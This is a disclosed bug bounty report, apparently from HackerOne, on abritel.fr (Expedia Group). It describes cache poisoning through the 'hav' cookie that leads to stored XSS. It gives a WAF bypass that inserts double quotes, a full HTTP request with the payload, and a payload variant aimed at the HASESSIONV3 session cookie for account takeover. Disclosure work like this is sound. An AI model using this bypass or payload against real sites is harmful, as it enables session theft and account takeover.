Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover)
High
E
Expedia Group Bug Bounty
Submitted None
Actions:
Reported by
bombon
Vulnerability Details
Technical details and impact analysis
## Summary:
Report #1698316 was closed as resolved
You told me that the stored XSS was going to be resolved since "As this relies on the same root cause, we will be closing it as duplicate", but no
abritel.fr has a strong WAF, however the server hides double quotes, allowing to bypass the WAF
e.g
The server blocks `</script`but if I send `</sc"ript>`
WAF is bypassed and the output is </script>
## Steps To Reproduce:
1-> Send this request
```http
GET /annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js?xxxd HTTP/2
Host: www.abritel.fr
Cookie: hav=xss"</sc"ript><sv"g/onloa"d=aler"t"(document.doma"in)>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.abritel.fr/signup?enable_registration=true&redirectTo=%2Fsearch%2Fkeywords%3Asoissons-france-%28xss%29%2FminNightlyPrice%2F0%3FpetIncluded%3Dfalse%26filterByTotalPrice%3Dtrue%26ssr%3Dtrue&referrer_page_location=serp
Upgrade-Insecure-Requests: 1
Te: trailers
```
2-> Using another browser visit:
https://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.jpeg?xxxd
Exploit:
This is the payload to extract the HASESSIONV3
xss"</sc"ript><sv"g/onloa"d=aler"t"(window.INITIAL_STATE.system.cookie)>
## Supporting Material/References:
{F2016192}
## Impact
Stored XSS to Account Takeover
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Stored